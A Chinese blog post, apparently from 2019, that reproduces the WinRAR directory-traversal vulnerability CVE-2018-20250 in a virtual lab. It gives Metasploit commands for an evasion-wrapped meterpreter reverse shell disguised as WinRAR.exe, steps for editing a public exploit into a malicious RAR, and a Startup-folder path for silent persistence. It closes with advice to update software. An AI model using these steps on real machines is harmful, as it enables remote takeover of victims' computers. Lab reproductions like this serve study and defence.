CVE-2018-20250(WinRAR目录穿越漏洞)复现

  • 前言
  • 复现准备
  • 复现过程
  • 后记

一.前言

2月下旬,著名压缩软件WinRAR被曝高危漏洞,全球已有超过5亿用户受到影响。该漏洞一旦被黑客利用,黑客就能将恶意程序植入使用者电脑的开机程序中,该漏洞在2005年便已经存在。

本文在虚拟环境中,使用Metasploit对漏洞攻击进行复现,展示其攻击过程,供大家学习和参考。


二.复现准备

1.漏洞描述

该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在 2006 年被编译,没有任何的基础保护机制(ASLR, DEP 等)。该动态链接库的作用是处理 ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行。

2.漏洞影响

WinRAR < 5.70 Beta 1

Bandizip < = 6.2.0.0

好压(2345压缩) < = 5.9.8.10907

360压缩 < = 4.0.0.1170

3.复现环境

虚拟环境搭建:VMware Workstation 15 pro

网络模式:NAT

攻击机:kali Linux 2019.1 IP:192.168.28.136

靶机:Windows 7 ultimate sp1 x64 IP:192.168.28.128


三.复现过程

1.使用Metasploit5生成免杀Payload

在kali Linux中输入msfconsole命令启动Metasploit

在Metasploit中依次输入

1
2
3
4
use evasion/windows/windows_defender_exe
show info
set filename WinRAR.exe
set payload windows/meterpreter/reverse_tcp

mete1

输入show options查看配置

mete2

使用如下命令修改配置

1
2
set lhost 192.168.28.136
set lport 12345

修改完成后输入run运行,提示生成如下文件

mete3

2.使用exp生成恶意文件

exp下载:https://github.com/WyAtu/CVE-2018-20250/

2.1修改exp.py文件

将exp.py中的evil_filename“的值改为"WinRAR.exe",将target_filename的值改为".\hi.exe"

2.2生成恶意文件

将刚才使用Metasploit生成的WinRAR.exe文件复制到下载的exp文件夹内,使用python exp.py命令生成恶意程序test.rar

值得注意的是,执行此命令需要python3以上的环境,另外如果在Linux系统中执行不成功可以尝试使用Windows系统来执行

3.在kali Linux中使用Metasploit监听靶机

在Linux终端中运行如下命令

1
2
3
4
5
6
7
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.28.128
set lport 12345
run

4.在靶机上运行恶意程序

test.rar文件放入靶机,解压该文件,解压后会生成如下文件

win7_1

双击执行hi.exe文件,此时kali Linux中会收到会话,即可获得靶机权限

listen


四.后记

以上便是使用CVE-2018-20250漏洞对靶机进行攻击的整个复现过程,我们看到病毒可以通过恶意压缩包进行传播,在本次复现中,我们将病毒文件直接解压在压缩文件解压的目标文件夹中并手动运行的,其实我们是可以通过修改exp.py文件中target_filename的值来修改病毒文件解压出来的位置,例如对win7系统的靶机,我们可以将值修改为r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe",这样病毒文件就会在下次开机是自动启动,悄无声息的完成对电脑的攻击。

大家可以留意一下自己电脑中压缩软件的版本,选择最新版本的软件即可防止此类攻击,同时也要养成好的习惯,不随意下载和使用不明来源的压缩文件



-------------本文结束感谢您的阅读-------------

本文标题:CVE-2018-20250(WinRAR目录穿越漏洞)复现

文章作者:J2ck7a1 Ch33

发布时间:2019年03月16日 - 21:03

最后更新:2019年04月03日 - 20:04

原始链接:http://yoursite.com/winrar-CVE-2018-20250复现/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。


想喝快乐水